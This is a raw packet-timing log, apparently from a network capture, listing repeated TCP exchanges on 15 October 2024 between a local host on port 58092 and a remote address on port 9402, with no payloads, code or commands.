                                                                    Oct 15, 2024 17:45:32.390407085 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:45:32.395586967 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:45:32.651048899 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:45:32.704742908 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:45:45.080651045 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:45:45.085624933 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:45:45.326149940 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:45:45.376842976 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:45:55.596782923 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:45:55.642076969 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:45:57.783304930 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:45:57.788338900 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:45:58.027617931 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:45:58.079587936 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:07.892352104 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:07.897643089 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:08.136615038 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:08.188868046 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:16.493330956 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:16.498405933 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:17.332458973 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:17.376318932 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:21.954672098 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:21.959753990 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:23.501557112 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:23.548142910 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:24.251741886 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:24.256769896 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:24.501601934 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:24.548108101 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:25.546586990 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:25.595793962 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:28.501545906 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:28.506485939 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:28.753110886 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:28.798070908 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:33.191693068 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:33.278302908 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:33.517713070 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:33.563661098 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:41.379575968 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:41.388987064 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:41.664778948 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:41.876112938 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:42.375535011 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:42.380436897 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:42.551076889 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:42.556130886 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:42.623753071 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:42.673099995 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:43.149064064 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:43.376147032 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:43.518716097 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:43.518820047 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:44.470850945 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:44.517342091 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:45.064754009 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:45.296247959 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:45.298401117 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:45.376089096 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:45.537363052 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:45.673038006 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:46.174671888 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:46.179738045 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:46.446362972 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:46.672945976 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:48.523439884 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:48.529175043 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:48.771066904 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:48.853873968 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:48.858911991 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:49.096956015 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:49.172960043 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:49.193799019 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:49.198786020 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:49.437617064 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:49.563549995 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:51.048274040 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:51.053322077 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:51.067390919 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:51.072628975 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:51.292180061 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:51.298629045 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:51.303940058 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:51.417151928 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:51.544193029 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:51.546946049 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:52.002401114 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:52.007489920 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:52.246428967 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:52.284923077 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:52.289915085 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:52.529897928 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:52.672905922 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:52.889611959 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:52.894824028 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:52.908020020 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:52.913048983 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:53.138612032 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:53.259763956 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:53.259830952 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:54.080821037 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:54.086003065 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:54.327184916 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:54.469774008 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:54.546503067 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:54.551553011 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:54.790710926 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:54.969769955 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:55.568571091 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:55.766659975 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:56.004986048 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:56.005053997 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:57.076320887 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:57.081497908 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:57.671108961 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:57.876005888 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:58.237016916 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:58.242077112 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:58.353374004 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:58.358539104 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:58.719543934 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:58.840030909 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:58.840090990 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:58.945208073 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:58.950110912 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:59.488049030 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:59.493035078 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:59.527376890 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:59.672867060 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:46:59.739535093 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:46:59.876015902 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:00.650913954 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:00.698486090 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:01.244555950 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:01.313855886 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:02.059803963 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:02.064960957 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:02.235642910 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:02.240941048 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:02.307097912 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:02.469712973 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:02.479913950 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:02.590358019 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:03.899323940 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:03.904438972 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:04.145715952 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:04.225049019 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:04.230515957 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:04.296406031 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:04.301441908 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:04.678848982 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:04.803325891 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:04.803432941 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:04.872812033 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:05.070318937 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:05.174653053 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:05.179788113 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:05.297966003 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:05.303015947 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:05.312028885 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:05.431719065 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:05.431801081 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:05.497706890 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:05.546574116 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:05.555104017 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:05.672837973 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:06.084538937 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:06.172835112 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:06.960228920 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:06.965192080 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:07.213713884 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:07.266568899 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:08.625111103 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:08.630359888 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:08.861773014 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:08.866833925 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:08.868926048 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:08.969688892 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:09.127357006 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:09.139388084 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:09.186290026 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:09.298243046 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:09.303275108 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:09.365824938 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:09.370965958 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:09.387001991 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:09.543030024 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:09.543100119 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:09.851332903 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:09.942492008 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:10.552325964 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:10.602382898 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:11.138290882 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:11.222203016 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:11.227184057 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:11.475117922 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:11.533682108 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:13.118757963 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:13.123604059 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:13.364947081 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:13.579026937 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:16.092602968 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:16.097609043 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:16.353023052 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:16.405158043 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:16.410119057 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:16.434328079 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:16.440579891 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:16.669404984 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:16.875914097 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:16.964895010 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:17.038583994 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:17.043679953 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:17.290406942 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:17.375880003 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:17.382493973 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:17.387511015 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:17.672075033 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:17.700675964 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:17.705583096 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:17.954329014 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:18.172763109 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:20.329178095 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:20.334191084 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:20.377080917 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:20.382358074 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:20.575321913 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:20.672786951 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:20.883903027 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:20.966859102 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:20.972934961 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:21.216953993 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:21.266474962 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:21.398958921 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:21.406044006 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:21.572535992 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:21.577425957 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:21.666069984 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:21.812130928 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:22.169729948 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:22.281627893 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:23.928426981 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:23.933386087 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:24.043286085 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:24.048432112 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:24.192264080 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:24.311775923 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:24.311862946 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:24.327841997 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:24.332920074 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:24.573478937 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:24.766454935 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:24.848392963 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:24.853558064 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:24.897962093 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:24.902985096 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:25.270358086 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:25.375837088 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:25.393548965 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:25.563338041 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:25.570197105 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:25.672735929 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:26.221777916 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:26.226936102 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:26.465461016 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:26.563369036 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:28.381748915 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:28.386753082 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:28.630327940 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:28.672719955 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:30.314677954 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:30.319684982 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:30.539180040 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:30.544137001 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:30.561111927 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:30.660418034 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:30.787137032 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:30.875808954 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:31.140008926 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:31.142294884 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:31.755656958 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:31.814157963 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:32.008737087 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:32.063462973 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:32.431925058 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:32.436903000 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:32.498191118 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:32.503221035 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:32.675745964 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:32.681777000 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:32.686696053 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:32.797413111 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:32.858000994 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:32.926894903 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:32.969523907 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:32.969696999 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:32.974637985 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:33.221169949 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:33.266880989 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:34.152291059 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:34.157536030 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:34.217967987 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:34.222836018 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:34.222887039 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:34.228079081 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:34.398494959 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:34.417140961 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:34.421989918 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:34.472310066 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:34.477210999 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:34.518678904 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:34.550448895 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:34.555356979 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:34.679855108 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:34.684979916 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:34.696590900 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:35.063302994 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:35.114696980 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:35.114872932 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:35.114932060 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:35.115411997 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:35.115447998 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:35.115503073 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:35.116030931 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:35.116097927 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:35.116130114 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:35.116188049 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:35.162122011 CEST94025809212.221.146.138192.168.2.8
